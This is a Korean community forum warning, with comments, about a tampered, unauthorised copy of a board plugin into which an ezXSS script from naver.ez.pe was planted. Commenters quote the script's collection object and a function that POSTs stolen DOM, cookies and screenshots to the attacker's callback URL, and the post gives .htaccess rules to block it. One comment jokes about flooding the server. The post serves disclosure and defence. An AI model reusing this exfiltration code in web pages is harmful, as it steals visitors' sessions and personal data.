[주의] 최근 무단 배포된 파일 XSS공격 코드 확인
안녕하세요.
최근 무단 배포된 파일을 제보받아 금일 확인하였습니다.
소스코드 확인결과
보안 강화 (SQL Injection 취약점 개선, XSS 취약점 개선) 패치 이전의 버전 (1.0.2) 으로 추정되며
비 멤버십 회원이 구매 > 수정하여 무단 배포한 것으로 추측 됩니다.
아울러, 무단배포된 파일을 다운로드 하셔서 사용중이시라면
즉시 사용을 중단해주세요.
입력폼 등에 스크립트가 심어져 있는것을 확인하였습니다.
원본코드 (정상)
무단배포된 코드 (naver 도메인으로 스크립트가 심어져 있습니다.)
해당 스크립트는 ezXSS라는 XSS 탐지 도구 입니다.
공격자가 이를 활용하여 피싱, 세션 탈취, 키로깅, 크립토재킹 등의 공격을 수행할 수 있습니다.
1. 웹사이트 방문자의 세션 및 개인정보 유출
2. 관리자 계정이 공격당할 가능성 증가
3. 웹페이지 변조 또는 자동 리디렉션
@고돌스 님 께서 알려주셨습니다. (탈취되는 정보)
dom: "전체 HTML",
cookie: "세션 ID",
screenshot: "Base64 이미지 데이터",
user-agent: "브라우저 정보",
차단방법
* 해당 도메인(naver.ez.pe)을 웹 방화벽(WAF) 또는 보안 시스템에서 차단
* .htaccess 파일에 다음 코드를 추가하여 해당 스크립트 차단
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} naver.ez.pe [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ezXSS [NC]
RewriteRule .* - [F,L]
</IfModule>
무단으로 배포되는 파일은 절대 사용하지 마시고,
사용하셨다면 즉각 폐기처리 해주세요.
댓글 31개
ssl인증서 정보로 보아 3월 2일+90일로 되어있네용.
This website contacted 1 IPs in 1 countries across 1 domains to perform 2 HTTP transactions. The main IP is 104.21.50.90, located in and belongs to CLOUDFLARENET, US. The main domain is naver.ez.pe.
TLS certificate: Issued by WE1 on March 2nd 2025. Valid for: 3 months.
아래는 urlscan.io의 결과 스샷입니다.
혹시 궁금하신 분들이 접속하실지도 모르겠지만 curl로 헤더정보만 받아오시길. 본문은 받으심 아니됩니다.
코드중 아래 부분이 핵심인것으로 보여집니다.
// 데이터 수집 내용
ez_rD = {
dom: "전체 HTML",
cookie: "세션 ID",
screenshot: "Base64 이미지 데이터",
user-agent: "브라우저 정보",
payload: "//naver.ez.pe/" <= 악성 서버 주소
};
// 데이터 전송 함수
function ez_cb(t, e) {
var n = new XMLHttpRequest();
n.open("POST", "https://naver.ez.pe/callback", true); n.setRequestHeader("Content-Type", "text/plain");
n.send(JSON.stringify(t)); <= 수집된 데이터 전송
}
@펄스나인 ez_persist 함수로 브라우저 스토리지에 영구 저장하는 것이랑 window.onload시 사용자 클릭시 지속적 이벤트 로깅후 전송이랑 세션스토리지/로컬스토리지 수집 기능도 있네요. 현재 페이지 URL(location.toString()), 사용자IP, iframe 로딩 여부까지.
한마디로 환장파티.. 힘내세요. 꼭 잡히면 좋겠습니다.
@울라프
보이는대로 떠서 base64 로 전송하는거같네요,,
에디터만들면서 이미지저장기능 구현하면서 잠깐 해봤는데 원하는 영역을 그대로 base64 로 만드는건 쉽더라구요..
@펄스나인
그럼 굳이 저 해킹 툴뿐만이 아니라도 인터넷에서 클릭 잘못하면 자기 화면 캡처 떠 가지고 상대방 에게 보내지는 건가요?
@울라프 이미지에 코드 심어 데이터 URL 스킴을 정상적인 URL로 가장해서 브라우저에 이미지 한장 띄우면 간단한 일이죠. 설명이니 이미지라 표현하는 거지 링크 누르는 즉시 실행가능한 방법도 많아요.
늘 조심조심.
// 데이터 전송 함수
function ez_cb(t, e) {
var n = new XMLHttpRequest();
n.open("POST", "https://naver.ez.pe/callback", true); n.setRequestHeader("Content-Type", "text/plain");
n.send(JSON.stringify(t)); <= 수집된 데이터 전송
}
이곳으로 대량의 디도스 공격을 보내버리는 방법도 있겠군요 ㅎㅎ
더미 데이터들 쫙 넣어서 ㅎㅎ
@똥싼너구리
그누에서 제이쿼리 안 쓰고
클래식 아작스를 사용하는 소스는 얼마만에 보는지 모르겠네요.
너구리님 사랑합니다.
@Gothrock 네.. 저도 그렇네요...
손해를 보더라도 악성유저는 만들지말자는 모토로 운영을 하고있고..
틀어지거나 문제가 있었던 분도 안계시는데, 답답할 따름이네요..ㅎㅎ..
@지니아이 네 규제정책에 의해 삭제된것같습니다..
댓글 20개를 못보고 답변을 못드린게 좀 아쉽네요..
일부러 다른 게시물까지 찾으셔서 댓글주심에 고맙습니다.
게시판 목록
자유게시판
| 번호 | 제목 | 글쓴이 | 날짜 | 조회 |
|---|---|---|---|---|
| 공지 |
 thisgun |
1주 전 | 10 | |
| 199688 | 2개월 전 | 187 | ||
| 199687 | 2개월 전 | 181 | ||
| 199686 | 2개월 전 | 484 | ||
| 199685 | 2개월 전 | 107 | ||
| 199684 | 2개월 전 | 167 | ||
| 199683 |
 Gothrock |
2개월 전 | 169 | |
| 199682 |
비버팩토리
|
2개월 전 | 114 | |
| 199681 | 2개월 전 | 176 | ||
| 199680 | 2개월 전 | 155 | ||
| 199679 | 2개월 전 | 126 | ||
| 199678 | 2개월 전 | 206 | ||
| 199677 |
Gothrock |
2개월 전 | 212 | |
| 199676 | 2개월 전 | 128 | ||
| 199675 | 2개월 전 | 104 | ||
| 199674 | 2개월 전 | 267 | ||
| 199673 | 2개월 전 | 170 | ||
| 199672 | 2개월 전 | 169 | ||
| 199671 | 2개월 전 | 146 | ||
| 199670 | 2개월 전 | 129 | ||
| 199669 |
Gothrock |
2개월 전 | 214 | |
| 199668 | 2개월 전 | 145 | ||
| 199667 |
nekoieye
|
2개월 전 | 206 | |
| 199666 | 2개월 전 | 167 | ||
| 199665 | 2개월 전 | 459 | ||
| 199664 | 2개월 전 | 161 | ||
| 199663 | 2개월 전 | 267 | ||
| 199662 |
 하이루에야 |
2개월 전 | 151 | |
| 199661 | 2개월 전 | 127 | ||
| 199660 |
별찢이내린다샤랄랄라랄라
|
2개월 전 | 234 | |
| 199659 |
Gothrock |
2개월 전 | 150 |
댓글 작성
댓글을 작성하시려면 로그인이 필요합니다.
로그인하기